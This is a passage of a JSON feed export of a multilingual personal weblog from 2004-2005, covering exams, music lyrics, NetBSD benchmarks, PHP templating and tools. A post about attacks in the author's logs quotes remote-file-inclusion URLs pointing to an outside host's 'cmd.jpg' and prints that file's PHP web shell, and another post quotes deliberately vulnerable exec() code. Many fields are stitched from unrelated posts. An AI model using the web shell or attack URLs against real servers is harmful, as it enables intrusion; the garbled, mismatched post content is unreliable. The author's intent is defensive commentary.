", "url": "https://blog.x-way.org/School/2005/02/18/Fin-des-Examens-de-printemps.html", "tags": ["School"], "date_published": "2005-02-18T17:15:36+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324057", "title": "Nach dem Booten", "content_text": "Die ersten 5 Dinge, die ich tue, wenn ich mich an den Computer setze: Einloggen startx Sylpheed-Claws, Firefox und XMMS starten Warten bis die E-Mails abgerufen sind E-Mails lesenDie ersten 5 Websites, die ich besuche:x-logsymlink.chheise.deder Rest hĂ€ngt davon ab, was ich eigentlich am Computer machen wollte…Via cyrus.ruhr.de, Pocket-Blog, LostFocus, Late Night Blog.", "content_html": "Die ersten 5 Dinge, die ich tue, wenn ich mich an den Computer setze:
Die ersten 5 Websites, die ich besuche:
Via cyrus.ruhr.de, Pocket-Blog, LostFocus, Late Night Blog.
", "url": "https://blog.x-way.org/Misc/2005/01/09/Nach-dem-Booten.html", "tags": ["Misc"], "date_published": "2005-01-09T00:24:59+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324056", "title": "Colors", "content_text": "I’ve found some color resources & utilities on del.icio.us.These are always useful, especially since i’m not the person who canjust throw together three colors and automatically the result looksgood.EasyRGB – Search for color harmonies, complements and themes for your RBG valuesColor Blender – Calculate midpoint colors4096 Color Wheel – Color Wheel with corresponding web-safe & web-smart colorsSpectacle – Tweaked web-smart Color SchemesAdam Poselli » Get the Look – Design & style guidesAdam Poselli » Where’d Ya Get That Color Scheme? – Color schemes from photographsAdam Poselli’s 2005 Color Forecast – ColorsAdam Poselli’s 2004 Color Forecast – More colorsmezzoblue § Colour Schemes – How to select colors", "content_html": "I’ve found some color resources & utilities on del.icio.us.These are always useful, especially since i’m not the person who canjust throw together three colors and automatically the result looksgood.
Gregory McGarry has made a benchmark comparison between NetBSD 2.0 and FreeBSD 5.3.
(via mindtrap::weblog)
The main differences are that NetBSD scales O(1) on forking newprocesses while FreeBSD scales O(n). For memory mapping and socketcreation both scale O(1) but NetBSD is twice as fast as FreeBSD
But for binding addresses to sockets, FreeBSD scales O(1) whileNetBSD scales O(n) but is twice as fast for a small number of boundsockets. Also for POSIX thread creation FreeBSD scales O(1) whileNetBSD scales something like O(n) and is twice as fast for a smallnumber of threads.
", "url": "https://blog.x-way.org/NetBSD/2005/01/07/NetBSD-20-vs-FreeBSD-53.html", "tags": ["NetBSD"], "date_published": "2005-01-07T21:00:56+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324054", "title": "Nightwish - The Pharaoh Sails To Orion", "content_text": ""Get away from me!Take heed to thyself and see my face no more!for in the day Thou see my faceThou shalt die!"– Exodus 10:28A constellation of divine architecture built on EarthA holy harbour – OrionNautical ascension to the firmamentShip-shaped barrows open my heart to the wisdom of this landSailing with the Serpent Chimera of a fiendish sandmanThe Unicorn arrives with the westwind to dream His funeral"Thou art born for Horus dwells in Thee"Slumbering with the ebb and the flow of this foaming tomb"Thou art born for Seteh dwells in Thee"Reveal your face to me and guide me through the Stygian fieldsEnthral my soul to Sepedet’s beams to serve Your willSailing on the distant seas from darkness to deliveranceTales like the ocean written to the Draco’s glanceRuling with the scythe of death you tear our philosophies apartAn ancient starwalk to merge into the stars"Open thy veins for my venomKiss the cobras with thy twisted tongueSo shalt thou join the empyrean circusWhere beggars mourn and seraphs danceIn this twilight cathedralShall I wed thee,O Bride of the Netherworld"Sailing on the distant seas...Join my soul the Hunter in the sky", "content_html": "This paper has presented a suite of benchmarks and results for comparing the performance of NetBSD 2.0 and FreeBSD 5.3 in the areas of core operating system functionality, network scalability and thread performance.
The results clearly indicate that recent architectural decisions in the NetBSD operating system have closed the performance gap between NetBSD and FreeBSD. In fact, NetBSD has surpassed FreeBSD in performance in the areas investigated in this paper. Significant performance improvements are obviously visible in the thread implementation.
"Get away from me!
Take heed to thyself and see my face no more!
for in the day Thou see my face
Thou shalt die!"
– Exodus 10:28
A constellation of divine architecture built on Earth
A holy harbour – Orion
Nautical ascension to the firmament
Ship-shaped barrows open my heart to the wisdom of this land
Sailing with the Serpent Chimera of a fiendish sandman
The Unicorn arrives with the westwind to dream His funeral
"Thou art born for Horus dwells in Thee"
Slumbering with the ebb and the flow of this foaming tomb
"Thou art born for Seteh dwells in Thee"
Reveal your face to me and guide me through the Stygian fields
Enthral my soul to Sepedet’s beams to serve Your will
Sailing on the distant seas from darkness to deliverance
Tales like the ocean written to the Draco’s glance
Ruling with the scythe of death you tear our philosophies apart
An ancient starwalk to merge into the stars
"Open thy veins for my venom
Kiss the cobras with thy twisted tongue
So shalt thou join the empyrean circus
Where beggars mourn and seraphs dance
In this twilight cathedral
Shall I wed thee,
O Bride of the Netherworld"
Sailing on the distant seas...
Join my soul the Hunter in the sky
", "url": "https://blog.x-way.org/Music/2005/01/06/Nightwish---The-Pharaoh-Sails-To-Orion.html", "tags": ["Music"], "date_published": "2005-01-06T14:24:02+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324053", "title": "Smarty", "content_text": "Angeregt durch Gordons Smarty Posting gibts es hier nun auch einen Eintrag ĂŒber Template Systeme und ein paar interessante Links.Angefangen hat das mit den Templates, als ich vor 2 Jahren die Website fĂŒr meine Klasse des Gymnasiums gemacht habe. Damals benutze ich die P.E.T. Template-Engine von Andreas Demmer.In der damals top-aktuellen Version 1.5 musste man Template-Tags in einer etwas unhandlichen Form benutzen: <!-- {tag} -->Als ich vor einem Jahr mein Weblog komplett neu programmierte,wollte ich auch ein Template-System benutzen, aber ohne so umstĂ€ndlicheTags.Inspiriert von diesem Artikelhabe ich eine PHP-Klasse programmiert, welche eigentlich nichts anderesmacht, als ein paar Variablen zu speichern und eine Template-Datei zuinkludieren. Die Template-Tags sind auf <?=$tag;?> geschrumpftund man kann die ganze Vielfalt von PHP nutzen ohne die Template-Dateispeziell zu parsen.Im letzten Sommer habe ich einen Ferienjob gesucht und mich auf eine Ausschreibung des KIS gemeldet. Als Anforderung wurden unter anderem Smarty Kenntnisse genannt, und so habe ich mir einen Abend Zeit genommen und mich in Smarty hineingearbeitet.FrĂŒher habe ich mich etwas vor Smarty gedrĂŒckt, weil es mir etwas schwerfĂ€llig schien mit Template-Kompilierung, Caching etc.Dochseit ich mich intensiv damit beschĂ€ftige und auch entdecken durfte,dass die kompilierten Templates eigentlich genau meinem"include"-Template System entsprechen, habe ich meine Meinung geĂ€ndert.Nun setzte ich Smarty auch bei eigenen Projekten ein.Hier noch ein paar gesammelte Links zu Smarty:Smarty i18n Plugin – Internationalisierung für SmartySmartyValidate – Form Validation mit SmartyEin PlĂ€doyer fĂŒr SmartyBeWiki – Smarty – LinksammlungSmarty Plugin Verzeichnis", "content_html": "Angeregt durch Gordons Smarty Posting gibts es hier nun auch einen Eintrag ĂŒber Template Systeme und ein paar interessante Links.
Angefangen hat das mit den Templates, als ich vor 2 Jahren die Website fĂŒr meine Klasse des Gymnasiums gemacht habe. Damals benutze ich die P.E.T. Template-Engine von Andreas Demmer.
In der damals top-aktuellen Version 1.5 musste man Template-Tags in einer etwas unhandlichen Form benutzen: <!-- {tag} -->
Als ich vor einem Jahr mein Weblog komplett neu programmierte,wollte ich auch ein Template-System benutzen, aber ohne so umstÀndlicheTags.
Inspiriert von diesem Artikelhabe ich eine PHP-Klasse programmiert, welche eigentlich nichts anderesmacht, als ein paar Variablen zu speichern und eine Template-Datei zuinkludieren. Die Template-Tags sind auf <?=$tag;?> geschrumpftund man kann die ganze Vielfalt von PHP nutzen ohne die Template-Dateispeziell zu parsen.
Im letzten Sommer habe ich einen Ferienjob gesucht und mich auf eine Ausschreibung des KIS gemeldet. Als Anforderung wurden unter anderem Smarty Kenntnisse genannt, und so habe ich mir einen Abend Zeit genommen und mich in Smarty hineingearbeitet.
FrĂŒher habe ich mich etwas vor Smarty gedrĂŒckt, weil es mir etwas schwerfĂ€llig schien mit Template-Kompilierung, Caching etc.
Dochseit ich mich intensiv damit beschÀftige und auch entdecken durfte,dass die kompilierten Templates eigentlich genau meinem"include"-Template System entsprechen, habe ich meine Meinung geÀndert.
Nun setzte ich Smarty auch bei eigenen Projekten ein.
Hier noch ein paar gesammelte Links zu Smarty:
Motivated by Joel’s Advice for Computer Science College Students i beginn now to blog also in english. The target is to improve my written english skills.
I hope that this experiment doesn’t result like the french one, whichis dying poorly since i daily speak french and don’t write in itanymore.
Seit heute Abend bekomme ich von folgenden Hosts etwas 'spezielle' HTTP Anfragen, welche hier zum GlĂŒck wirkungslos sind:
Dazu sunflyer.ch:
", "url": "https://blog.x-way.org/Coding/2004/12/26/phpBB-Wurm.html", "tags": ["Coding"], "date_published": "2004-12-26T01:43:52+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324050", "title": "Weihnachten", "content_text": "Frohe Festtage!", "content_html": "Frohe Festtage!", "url": "https://blog.x-way.org/Misc/2004/12/24/Weihnachten.html", "tags": ["Misc"], "date_published": "2004-12-24T17:59:46+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324049", "title": "NoĂ«l", "content_text": "Joyeuses fêtes!", "content_html": "Joyeuses fêtes!", "url": "https://blog.x-way.org/Misc/2004/12/24/Noel.html", "tags": ["Misc"], "date_published": "2004-12-24T17:58:11+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324048", "title": "Gmail", "content_text": "Seit neustem habe auch ich so einen Gmail-Account und habe nun einige Einladungen zu verschenken.Wer Interesse daran hat, soll sich melden.", "content_html": "Beeindruckend ist die Anzahl von Opfern, die irgendwie sowas in ihren Sourcen haben mĂŒssen.
<?php
foreach ($_GET as $_get) {
exec ($_get);
}
?>
Seit neustem habe auch ich so einen Gmail-Account und habe nun einige Einladungen zu verschenken.
Wer Interesse daran hat, soll sich melden.
Hier wird versucht Mac OS X Anwendungen unter NetBSD zum laufen zu bringen.
Da ich auf meinem PowerBook gerne einige kommerzielle Programme benutzen möchte, aber dennoch auf die Programmvielfalt eines \"freien\" Unixsystems nicht verzichten möchte, habe ich vor mich in Zukunft etwas mit NetBSD zu beschÀftigen.
Der erste Schritt dazu ist schon gemacht: Seit gestern Abend lÀuft auf meinem alten Testrechner NetBSD 1.6.2 :-)
", "url": "https://blog.x-way.org/NetBSD/2004/08/23/NetBSD.html", "tags": ["NetBSD"], "date_published": "2004-08-23T23:20:28+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324046", "title": "Examens Propédeutique I", "content_text": "Examen réussi sur décision de la Conférence des notes :-)", "content_html": "Examen réussi sur décision de la Conférence des notes:-)", "url": "https://blog.x-way.org/School/2004/07/31/Examens_Propedeutique_I.html", "tags": ["School"], "date_published": "2004-07-31T13:38:40+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324045", "title": "Anschauen!", "content_text": "collecting best practice webdesign resources", "content_html": "collecting best practice webdesign resources", "url": "https://blog.x-way.org/Webdesign/2004/07/25/Anschauen.html", "tags": ["Webdesign"], "date_published": "2004-07-25T00:25:23+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324044", "title": "Quicklinks Webdesign", "content_text": "Rounded Corners in CSS via del.icio.usCSS Photo Zoom via LinkDumpFlash Interface Design via metamorphine", "content_html": "
Wie schon angekĂŒndigt haben wir im Programmieren ein Projekt gemacht, welches nun letzten Sonntag fertig wurde. Herausgekommen ist ein kleines Bomberman-Spiel, welches man hier herunterladen kann (fĂŒr Interessierte gibts hier noch die Sourcen).
Das Spiel hat ziemlich viele Bugs und Fehler, welche vor allem daher kommen, dass wir die ganze Spiel-Engine von den Assistenten geliefert bekammen. Die Engine ist jedoch ohne ein intelligentes Design, mit lauter Fehlern und Exceptions und in einem schrecklichen Code-Stil gemacht worden. So braucht beispielsweise der Konstruktor der Klasse, welche die Netzwerk-Sockets erstellt, eine Referenz auf ein GUI-Element um allfÀllige Netzwerkfehler direkt dorthinein zu schreiben!
Und auch die langen Wartezeiten beim starten von Spielen sind nur da, weil die Engine mit vielen NullPointer-Exceptions abstĂŒrzt wenn ein Spiel in Echtzeit gestartet wird!
Programmiert haben wir eigentlich \"nur\" die kĂŒnstliche Intelligenz, den Leveleditor und das Fenster um die verschiedenen Spieltypen auszuwĂ€hlen (UrsprĂŒnglich musste der Benutzer mittels Kommandozeile die einzelnen Clients und Server starten und miteinander verbinden!).
Wer keinen Fernseher hat, kann im Simulationsmodus schauen wie die kĂŒnstliche Intelligenz gegen sich selbst spielt. Das kann durchaus eine abendfĂŒllende Spielzeit annehmen!
", "url": "https://blog.x-way.org/Coding/2004/07/03/Bomberman_2004.html", "tags": ["Coding"], "date_published": "2004-07-03T22:20:51+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324043", "title": "Analysis ĂŒberlebt!", "content_text": "Hier hat sich in den letzten paar Wochen nicht sehr viel geĂ€ndert, da ich PrĂŒfungen hatte und noch habe.Jedoch ist das Schlimmste seit heute Morgen vorbei :-)", "content_html": "Hier hat sich in den letzten paar Wochen nicht sehr viel geĂ€ndert, da ich PrĂŒfungen hatte und noch habe.
Jedoch ist das Schlimmste seit heute Morgen vorbei :-)
", "url": "https://blog.x-way.org/School/2004/07/03/Analysis_ueberlebt.html", "tags": ["School"], "date_published": "2004-07-03T22:10:05+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324041", "title": "PowerBook Buttons", "content_text": "Nachdem ich diese Artikel gelesen hatte, kam ich plötzlich auf die Idee die bisher nicht funktionerenden Spezialbuttons meines PowerBooks zum laufen zu kriegen.Dies stellte sich unerwarteterweise als gar nicht so schwer heraus, und nun gibts hier einen Patch fĂŒr den 2.6.3 Kernel :-)*kernelhacking*", "content_html": "Nachdem ich diese Artikel gelesen hatte, kam ich plötzlich auf die Idee die bisher nicht funktionerenden Spezialbuttons meines PowerBooks zum laufen zu kriegen.
Dies stellte sich unerwarteterweise als gar nicht so schwer heraus, und nun gibts hier einen Patch fĂŒr den 2.6.3 Kernel :-)
*kernelhacking*
", "url": "https://blog.x-way.org/Mac/2004/06/17/PowerBook_Buttons.html", "tags": ["Mac"], "date_published": "2004-06-17T14:12:01+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324040", "title": "Alle 20 Minuten Spam", "content_text": "Wie ich vorhin gerade bemerkt habe, habe ich in den letzten 12 Tagen 800 Spam-Mails erhalten. GlĂŒcklicherweise hat mein Spam-Filter 780 davon erkannt :-)", "content_html": "Wie ich vorhin gerade bemerkt habe, habe ich in den letzten 12 Tagen 800 Spam-Mails erhalten. GlĂŒcklicherweise hat mein Spam-Filter 780 davon erkannt :-)
", "url": "https://blog.x-way.org/Misc/2004/06/12/Alle_20_Minuten_Spam.html", "tags": ["Misc"], "date_published": "2004-06-12T23:32:56+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324039", "title": "phpPatterns()", "content_text": "Auf phpPatterns() findet man viele Artikel zu Patterns und Objektorientierter Programmierung.Wer mit Mozilla unterwegs ist, kann dort auch den XUL Viewer ausprobieren.", "content_html": "Auf phpPatterns() findet man viele Artikel zu Patterns und Objektorientierter Programmierung.
Wer mit Mozilla unterwegs ist, kann dort auch den XUL Viewer ausprobieren.
", "url": "https://blog.x-way.org/Coding/2004/06/12/phpPatterns.html", "tags": ["Coding"], "date_published": "2004-06-12T21:30:02+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324038", "title": "Vim 6.3", "content_text": "Von Vim ist Version 6.3 erschienen.Via theflow", "content_html": "Von Vim ist Version 6.3 erschienen.
Via theflow
", "url": "https://blog.x-way.org/Linux/2004/06/09/Vim_6_3.html", "tags": ["Linux"], "date_published": "2004-06-09T21:23:35+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324037", "title": "Money, Money, Money", "content_text": "Seit ein paar Monaten, benutze ich GnuCash um mein \"Vermögen\" zu verwalten.GnuCash wurde in erster Linie fĂŒr Privatanwender und KMUs entwickelt und bringt entsprechende Features mit:Doppelte Buchhaltung mit allem was dazugehört: Journal, Tansaktionen etc.OFX Import (was leider in der Schweiz von keiner Bank angeboten wird)HBCI-UntersĂŒtzung (welche bisher vor allem in Deutschland angeboten wird)QIF-UnterstĂŒtzungGenerierung von BerichtenAktienkurse aus dem InternetDevisenkurse aus dem InternetHandling von Aktien- und Fonds PortfoliosKunden- und Lieferanten VerwaltungRechnungsverwaltungSteuerverwaltungFristenverwaltung", "content_html": "Seit ein paar Monaten, benutze ich GnuCash um mein \"Vermögen\" zu verwalten.
GnuCash wurde in erster Linie fĂŒr Privatanwender und KMUs entwickelt und bringt entsprechende Features mit:
http://waterwave.ch/weblog/detail.php?label=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;whttp://waterwave.ch/weblog/index.php?cat=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w
Na, billige XSS-Attacke falsch angewendet.
In http://cliente.escelsanet.com.br/metallz/cmd.jpg steht ĂŒbrigens dieser PHP-Code.
</center><font size="2"><pre>-<? if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));?>
Merke: Immer alle nicht vertrauenswĂŒrdigen Input-Daten (e.g. alle per POST, GET, COOKIE ĂŒbermittelten Daten) kontrollieren. Sehr oft werden hierzu Character type functions eingesetzt.
", "url": "https://blog.x-way.org/Coding/2004/05/16/XSS.html", "tags": ["Coding"], "date_published": "2004-05-16T15:00:12+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324035", "title": "Dillo mit Tabs", "content_text": "Wie ich nach einem Update erfreut festgestellt habe, kann Dillo jetzt auch mit Tabs umgehen.", "content_html": "Wie ich nach einem Update erfreut festgestellt habe, kann Dillo jetzt auch mit Tabs umgehen.
", "url": "https://blog.x-way.org/Linux/2004/05/16/Dillo_mit_Tabs.html", "tags": ["Linux"], "date_published": "2004-05-16T14:20:11+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324034", "title": "Balélec 2004", "content_text": "Le vendredi j'étais au Balélec et c'était vachement cool. 30 groupes sur 7 scÚnes pour 20 Francs, cela on ne trouve pas ailleurs.On se voit l'année prochaine, au 25-iÚme Balélec!", "content_html": "Le vendredi j'étais au Balélec et c'était vachement cool. 30 groupes sur 7 scÚnes pour 20 Francs, cela on ne trouve pas ailleurs.
On se voit l'année prochaine, au 25-iÚme Balélec!
", "url": "https://blog.x-way.org/Music/2004/05/16/Balelec_2004.html", "tags": ["Music"], "date_published": "2004-05-16T12:36:21+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324033", "title": "v2.04b", "content_text": "Neue Features:KommentarvorschauOn-the-fly Sprachwechsel der Navigationselemente (Deutsch/Französisch)", "content_html": "Neue Features:LĂ il y a 2170 boutons, mais aucun du Satellite. Donc j'ai crĂ©e moi-mĂȘme un bouton pour le Satellite.
", "url": "https://blog.x-way.org/Music/2004/05/08/Bouton_Satellite.html", "tags": ["Music"], "date_published": "2004-05-08T16:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324031", "title": "CVS", "content_text": "Momentan machen wir im Programmieren ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, CVS einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei ĂŒberzeugende Programme gefunden: TkCVS und LinCVS, das auch auf Windows portiert wurde.", "content_html": "Momentan machen wir im Programmieren ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, CVS einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.
Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei ĂŒberzeugende Programme gefunden: TkCVS und LinCVS, das auch auf Windows portiert wurde.
", "url": "https://blog.x-way.org/Linux/2004/05/08/CVS.html", "tags": ["Linux"], "date_published": "2004-05-08T14:00:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324030", "title": "Deadlock", "content_text": "Am Freitag feierte die Section d'Informatique ihr 20-jĂ€hriges Bestehen.Zuerst mussten 90 Minuten Reden diverser Professoren und ehemaliger PrĂ€sidenten der EPFL ĂŒberstanden werden. Da jeder Redner noch ein bisschen in der Vergangenheit schweifte, wurden aus den 90 Minuten 2 Stunden. Aber danach gabs ein ApĂ©ro mit einem fĂŒnfgĂ€ngigen Menu.Nachdem der offizielle Teil gebĂŒhrend genossen war, gings ab zum Deadlock. Da die Section d'Informatique einen Frauenanteil von 6% hat, wurde das Deadlock mit dem Fest der Sciences Sociales et Politiques der UNIL (95% Frauenanteil) zusammengelegt :-)So konnte der Rest des Abends einfach nur gut werden. Doch um 3 Uhr morgens waren auch die sechs Konzerte zuende und ich durfte noch fast ne Stunde nach Hause radeln...", "content_html": "Am Freitag feierte die Section d'Informatique ihr 20-jĂ€hriges Bestehen.CH7 ist ein neuer Schweizer Fim, der nach dem \"No Budget but high Quality\" Prinzip produziert worden ist. SĂ€mtliche Arbeit wurde ehrenatmlich geleistet und Sponsoren haben die Produktion unterstĂŒtzt.
Die Macherinnen und Macher von CH7 wollen zu der heute grassierenden Copyright-Hysterie einen Gegenpol bilden. Deshalb ist kann man CH7 seit dem 24.04.04 im Internet frei herunterladen und straffrei kopieren. Diese Vertriebsart ist einmalig und neu. CH7 untersteht der Creative Commons License. Feel free to share!
Wer das Projekt unterstĂŒtzen oder einfach nur danken möchte kann dies unter folgender Bankverbindung:
CREDIT SUISSE
Clearing Nr. 4595
Konto 917917-90 Yvan Piccinno
Vermerk: CH7 Download
Hier ist ein kleines Skript, welches in einem (X)HTML-Text nach Akronymen sucht und diese mit ihrer Definition ersetzt. Die Akronyme werden als assoziatives Array ĂŒbergeben und können nicht nur die Definition sondern auch andere Attribute wie z.B. die Sprache mitbringen. Das Skript ersetzt nur Text ausserhalb von HTML-Tags und ersetzt keine Akronyme die schon mit dem entsprechenden Tag ausgerĂŒstet sind.
ZusĂ€tzlich gibt es einen AnstĂ€ndigen Modus, in dem Akronyme nur ersetzt werden, wenn sie nicht in einem Wort integriert sind, sondern durch ein Zeichen davon getrennt sind. Die Trennzeichen werden auch als Parameter ĂŒbergeben. So wird beispielsweise PHPprogrammierer im anstĂ€ndigen Modus nicht ersetzt, hingegen PHP-Programmierer schon.
Einfach mal anschauen, vielleicht kanns ja sonst noch jemand gebrauchen.
", "url": "https://blog.x-way.org/Coding/2004/04/15/Acronymizer.html", "tags": ["Coding"], "date_published": "2004-04-15T19:35:22+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324026", "title": "Playlist", "content_text": "Markus Kniebes hat ein Skript geschrieben, welches mittels einer MySQL-Datenbank eine Ăbersicht ĂŒber die abgespielten MusikstĂŒcke erstellt. Erinnert mich ein bisschen an die Playlists in iTunes. Meine Playlist findet man hier :-)", "content_html": "Markus Kniebes hat ein Skript geschrieben, welches mittels einer MySQL-Datenbank eine Ăbersicht ĂŒber die abgespielten MusikstĂŒcke erstellt. Erinnert mich ein bisschen an die Playlists in iTunes. Meine Playlist findet man hier :-)
", "url": "https://blog.x-way.org/Misc/2004/04/15/Playlist.html", "tags": ["Misc"], "date_published": "2004-04-15T18:12:21+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324025", "title": "Na", "content_text": "Grab the nearest book.Open the book to page 23.Find the fifth sentence.Post the text of the sentence in your journal along with these instructions.In symbols, the average acceleration a, over a time interval Δt = t2 - t1 during which the velocity changes by Δv = v2 - v1, is defined asa = (v2 - v1)/(t2 - t1) = Δv/Δt.Douglas C. Giancoli - Physics for Scientists & EngineersVia Dunkle Zeiten.", "content_html": "In symbols, the average acceleration a, over a time interval Δt = t2 - t1 during which the velocity changes by Δv = v2 - v1, is defined as
a = (v2 - v1)/(t2 - t1) = Δv/Δt.
Douglas C. Giancoli - Physics for Scientists & Engineers
Via Dunkle Zeiten.
", "url": "https://blog.x-way.org/Misc/2004/04/15/Na.html", "tags": ["Misc"], "date_published": "2004-04-15T17:16:41+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324024", "title": "Mozilla Bug", "content_text": "Wie ich Andrew Porter Glendinning besuchte, entdeckte ich diesen Graphikfehler in Mozilla. Der Text lautet If you can read this, your browser doesn't support the over 4-year-old CSS Level 2 Recommendation. These icons should be fixed in the lower right corner of your browser window, and this message should be invisible.Nach der Analyse des Stylesheets, habe ich herausgefunden, dass der Text eigentlich ausserhalb des Browserfensters dargestellt werden sollte. Bei Mozilla hört das Browserfenster vor dem Scrollbalken auf, jedoch fĂŒr die Rendering-Engine erst am Fensterrand :-P", "content_html": "Wie ich Andrew Porter Glendinning besuchte, entdeckte ich diesen Graphikfehler in Mozilla. Der Text lautet
If you can read this, your browser doesn't support the over 4-year-old CSS Level 2 Recommendation. These icons should be fixed in the lower right corner of your browser window, and this message should be invisible.
Nach der Analyse des Stylesheets, habe ich herausgefunden, dass der Text eigentlich ausserhalb des Browserfensters dargestellt werden sollte. Bei Mozilla hört das Browserfenster vor dem Scrollbalken auf, jedoch fĂŒr die Rendering-Engine erst am Fensterrand :-P
", "url": "https://blog.x-way.org/Webdesign/2004/04/15/Mozilla_Bug.html", "tags": ["Webdesign"], "date_published": "2004-04-15T01:55:52+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324023", "title": "Sicheres Programmieren mit PHP", "content_text": "Secure Programming in PHPWriting Secure PHP CodeOn the Security of PHP, Part 1On the Security of PHP, Part 2Uff, GlĂŒck gehabt. Die erwĂ€hnten Punkte habe ich fast alle berĂŒcksichtigt, und die ausgelassenen SicherheitslĂŒcken funktionieren mit der hier installierten PHP-Version nicht mehr :-)Via absolut-marc.de", "content_html": "Uff, GlĂŒck gehabt. Die erwĂ€hnten Punkte habe ich fast alle berĂŒcksichtigt, und die ausgelassenen SicherheitslĂŒcken funktionieren mit der hier installierten PHP-Version nicht mehr :-)
Via absolut-marc.de
", "url": "https://blog.x-way.org/Coding/2004/04/15/Sicheres_Programmieren_mit_PHP.html", "tags": ["Coding"], "date_published": "2004-04-15T00:30:34+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324022", "title": "Developing With Web Standards", "content_text": "Developing With Web Standards Recommendations and best practices. Eine gute Ăbersicht, auch geeignet um Leute in die Thematik einzufĂŒhren.Via LinkDump", "content_html": "Developing With Web Standards Recommendations and best practices. Eine gute Ăbersicht, auch geeignet um Leute in die Thematik einzufĂŒhren.
Via LinkDump
", "url": "https://blog.x-way.org/Webdesign/2004/04/14/Developing_With_Web_Standards.html", "tags": ["Webdesign"], "date_published": "2004-04-14T21:07:50+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324021", "title": "Warum?", "content_text": "Kann mir jemand den Gedanken hinter folgendem Verhalten von XML_RPC erklĂ€ren?Ich bin dabei, einige XML-RPC Webservices in PHP zu programmieren. Leider gabs immer eine Fehlermeldung wenn ich eine bestimmte Funktion aufrufe.Zuerst suchte ich den Fehler in der Funktion beim XML-RPC-Server. Jedoch funktionierte die problemlos. Danach habe ich eine Ewigkeit mit den via XML-RPC ĂŒbergebenen Parameter herumgespielt, hat jedoch nichts gebracht.Dann habe ich in der XML-RPC-Klasse das Debug-Flag aktiviert. So konnte ich herausfinden, dass der XML-RPC-Server die Ausgabewerte der Funktionen ĂŒbergibt, was ja auch so sein muss. Das Debug-Flag machte auch, dass im XML-RPC-Client die empfangenen XML-Daten ausgegeben werden. Diese entsprachen den vom Server gesendeten. Doch leider gab mir das Debug-Flag keine Information warum das Parsen der XML-Daten fehlschlug.So habe ich mir mal den Code der XML-RPC-Klasse angeschaut und habe dort eine Funktion error_log entdeckt. Diese Funktion ist in PHP eingebaut und sendet eine Fehlermeldung. Nach dem Studium der Dokumentation habe ich herausgefunden, dass die Fehlermeldungen damit in den Error-Log vom Apache geschrieben werden!Also habe ich mir /var/log/apache2/error_log vorgenommen. Darin fand ich Fehlermeldungen des XML-Parsers, der sich ĂŒber ein invalid token beschwerte! Nach lĂ€ngerem Herumexperimentieren mit den Eingabewerten, fand ich heraus, dass der XML-Parser an einem nicht enkodierten Umlaut scheiterte.Da ich Umlaute nicht mehr enkodiere, sondern einfach das entsprechende encoding=\"iso-8859-15\" Attribut setzte, kontrollierte ich zuerst den XML-Header, wie er von der XML-RPC-Klasse generiert wird. Dort fand ich dann auch den Fehler: es wird kein encoding Attribut erzeugt.Warum werden nicht alle Umlaute etc. automatisch enkodiert, wenn kein encoding Attribut mitgeliefert wird?Warum gibt es ein Debug-Flag, aber Fehlermeldungen werden trotzdem nicht ausgegeben sondern weiterhin nur nach /var/log/apache2/error_log geschrieben?", "content_html": "Kann mir jemand den Gedanken hinter folgendem Verhalten von XML_RPC erklĂ€ren?
Ich bin dabei, einige XML-RPC Webservices in PHP zu programmieren. Leider gabs immer eine Fehlermeldung wenn ich eine bestimmte Funktion aufrufe.
Zuerst suchte ich den Fehler in der Funktion beim XML-RPC-Server. Jedoch funktionierte die problemlos. Danach habe ich eine Ewigkeit mit den via XML-RPC ĂŒbergebenen Parameter herumgespielt, hat jedoch nichts gebracht.
Dann habe ich in der XML-RPC-Klasse das Debug-Flag aktiviert. So konnte ich herausfinden, dass der XML-RPC-Server die Ausgabewerte der Funktionen ĂŒbergibt, was ja auch so sein muss. Das Debug-Flag machte auch, dass im XML-RPC-Client die empfangenen XML-Daten ausgegeben werden. Diese entsprachen den vom Server gesendeten. Doch leider gab mir das Debug-Flag keine Information warum das Parsen der XML-Daten fehlschlug.
